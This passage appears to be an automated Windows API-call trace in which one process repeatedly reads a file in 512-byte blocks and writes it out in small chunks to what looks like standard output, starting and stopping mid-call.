(in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.711] ReadFile 
(in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.712] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, 
lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] GetFileType (hFile=0x4c) returned 0x1 [0234.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.712] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, 
lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.713] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] GetFileType (hFile=0x4c) returned 0x1 [0234.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.713] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, 
lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] GetFileType (hFile=0x4c) returned 0x1 [0234.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.714] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.714] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0234.714] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] 
GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] GetFileType (hFile=0x4c) returned 0x1 [0234.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.715] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.716] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | 
out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.716] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, 
lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.717] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.717] GetFileType (hFile=0x4c) returned 0x1 [0234.717] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0234.717] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) 
returned 1 [0234.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.718] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] GetFileType (hFile=0x4c) returned 0x1 [0234.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.718] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.719] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x32, lpOverlapped=0x0) returned 1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] GetFileType (hFile=0x4c) returned 0x1 [0234.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.719] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x32, 
